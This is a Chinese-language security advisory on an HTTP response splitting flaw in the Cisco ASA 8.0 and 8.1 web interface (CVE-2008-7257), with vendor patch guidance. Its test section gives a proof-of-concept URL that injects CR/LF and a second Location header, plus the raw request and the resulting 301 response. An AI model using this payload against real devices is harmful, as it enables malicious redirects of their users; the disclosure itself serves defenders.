Cisco ASA HTTP响应拆分漏洞

受影响系统:

Cisco ASA 8.1
Cisco ASA 8.0

不受影响系统:

Cisco ASA 8.1(2)

描述:


BUGTRAQ  ID: 41159
CVE ID: CVE-2008-7257

Cisco自适应安全设备(Adaptive Security Appliances, ASA)是可提供安全和VPN服务的模块化平台。

Cisco ASA没有正确地验证用户所提供输入,远程攻击者可以通过提交特制的URL请求执行HTTP响应拆分攻击。

当用户通过HTTP连接到ASA的Web界面时,会被自动重新定向到SSL加密的版本,Web服务器向正在连接的客户端发布301 Moved Permanently状态代码以方便这种重新定向。如果客户端向URL附加了回车(%0d)和换行(%0a)符,Web服务器在解析时就会允许客户端注入任意HTTP响应头。通过这种方式就可以向客户端注入第二个Location头,而客户端的web浏览器仅会对所遇到的最后一个Location头执行操作并重新定向至该处。

<*来源:Daniel King
  
  链接:http://marc.info/?l=bugtraq&m=127748777510403&w=2
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

URL:
http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom

请求:
GET http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom HTTP/1.0
Host: /www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

响应:
HTTP/1.0 301 Moved Permanently
Server: Web Server
Location: https:///www.example2.com/
Location: http:///www.example3.com
Content-Type: text/html
Content-Length: 125

<HEAD><TITLE>Moved</TITLE></HEAD><BODY><A HREF="https://x.x.x.x/
Location: http://www.example2.com>Moved</A></BODY>

建议:


厂商补丁:

Cisco
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html

发表评论?

0 条评论。

发表评论